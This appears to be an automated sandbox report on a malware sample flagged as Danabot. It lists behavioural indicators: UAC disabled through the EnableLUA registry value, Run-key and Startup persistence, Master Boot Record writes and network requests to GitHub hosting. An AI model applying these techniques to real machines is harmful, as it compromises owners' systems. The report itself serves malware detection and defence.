Analysis Overview
SHA256
033316a58bf3b03c009304a59098d4af10944bb1022a997eb919eec3465959d2
Threat Level: Known bad
The file 6548553-Melissa-Virus-MR73006 was found to be: Known bad.
Malicious Activity Summary
Danabot
UAC bypass
Danabot x86 payload
Process spawned unexpected child process
Danabot family
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Loads dropped DLL
Modifies file permissions
Drops startup file
Executes dropped EXE
Checks whether UAC is enabled
Drops desktop.ini file(s)
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Writes to the Master Boot Record (MBR)
Drops file in System32 directory
UPX packed file
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Browser Information Discovery
Program crash
Suspicious behavior: EnumeratesProcesses
System policy modification
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Modifies Control Panel
Checks SCSI registry key(s)
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Checks processor information in registry
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious behavior: GetForegroundWindowSpam
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Kills process with taskkill
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-04-21 02:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-04-21 02:19
Reported
2025-04-21 02:30
Platform
win10v2004-20250314-en
Max time kernel
688s
Max time network
688s
Command Line
Signatures
Danabot
Danabot family
Danabot x86 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MEMZ (1).exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\MEMZ (1).exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Configuration Utility.exe | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Configuration Utility.exe | C:\Users\Admin\Downloads\Lacon.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\takeown.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Bndt32 = "C:\\Windows\\System32\\Bndt32.exe" | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Q4 = "c:\\eiram\\quake4demo.exe" | C:\Users\Admin\Downloads\Quamo.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\quake = "c:\\eiram\\quake4demo.exe" | C:\Users\Admin\Downloads\Quamo.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\quake = "f:\\quake4demo.exe" | C:\Users\Admin\Downloads\Quamo.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Q4 = "f:\\quake4demo.exe" | C:\Users\Admin\Downloads\Quamo.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\~~CB = "cb.exe" | C:\Users\Admin\Downloads\ColorBug.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| File created | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| File created | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| File created | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
| File created | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\Downloads\Illerka.C.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\V: | C:\Windows\SYSTEM32\takeown.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SYSTEM32\takeown.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SYSTEM32\mountvol.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Downloads\MEMZ (1).exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Downloads\ClassicShell.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Downloads\ClassicShell.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Downloads\ClassicShell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\No Call List.exe | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\No Call List.exe | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Bndt32.txt | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\No Call List.exe | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Bndt32.txt | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Bndt32.exe | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\No Call List.exe | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Bndt32.txt | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\No Call List.exe | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Bndt32.txt | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File created | C:\Windows\SysWOW64\Bndt32.txt | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Bndt32.txt | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\No Call List.exe | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\No Call List.exe | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File created | C:\Windows\SysWOW64\Bndt32.exe | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File created | C:\Windows\SysWOW64\No Call List.exe | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Bndt32.txt | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\No Call List.exe | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Bndt32.txt | C:\Users\Admin\Downloads\Lacon.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-mobile-hub\en-GB\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-notification-shared\ar\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-notification-shared\fr\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-shared-components\fi\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-shared-components\hu\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1639348720\data.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1030715518\hyph-nn.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1030715518\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\hub-signature.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-shared-components\ru\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\wallet\wallet-notification-config.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1030715518\hyph-gl.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1030715518\hyph-kn.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1030715518\hyph-mn-cyrl.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-notification-shared\es\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\Notification\notification.bundle.js.LICENSE.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\runtime.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1030715518\hyph-de-1996.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-notification-shared\id\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-tokenized-card\zh-Hans\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1979939502\edge_autofill_global_block_list.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_618854295\shopping.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-hub\sv\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-mobile-hub\pt-PT\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-shared-components\zh-Hant\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-tokenized-card\fr\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\wallet\README.md | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\wallet\super_coupon.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_618854295\shopping_iframe_driver.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\bnpl\bnpl.bundle.js.LICENSE.txt | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\crypto.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\wallet\wallet-checkout-eligible-sites.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\shopping_iframe_driver.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_700424168\LICENSE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_351056458\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1595283012\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1987350999\Microsoft.CognitiveServices.Speech.core.dll | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1030715518\hyph-cu.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_618854295\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-notification-shared\de\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\load-hub-i18n.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-mobile-hub\ru\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-notification\el\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\Wallet-Checkout\app-setup.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\wallet_checkout_autofill_driver.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1030715518\hyph-de-ch-1901.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-ec\hu\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\Tokenized-Card\tokenized-card.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1030715518\hyph-nl.hyb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-hub\es\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-shared-components\de\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-shared-components\th\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1030715518\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_700424168\adblock_snippet.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_700424168\Filtering Rules | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-hub\cs\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\wallet\wallet-checkout-eligible-sites-pre-stable.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1987350999\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\bnpl\bnpl.bundle.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\edge_driver.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-mobile-hub\id\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-mobile-hub\nl\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping2864_2109331853\json\i18n-notification\fr-CA\strings.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\WINDOWS\Start Menu\Programs\StartUp\creative.exe | C:\Users\Admin\Downloads\Prolin.exe | N/A |
| File created | C:\WINDOWS\Start Menu\Programs\StartUp\creative.exe | C:\Users\Admin\Downloads\Prolin (1).exe | N/A |
| File created | C:\WINDOWS\Start Menu\Programs\StartUp\creative.exe | C:\Users\Admin\Downloads\Prolin.exe | N/A |
| File created | C:\WINDOWS\Start Menu\Programs\StartUp\creative.exe | C:\Users\Admin\Downloads\Prolin.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\DanaBot.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\FlashKiller.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Funsoul.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Lacon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Lacon.exe | N/A |
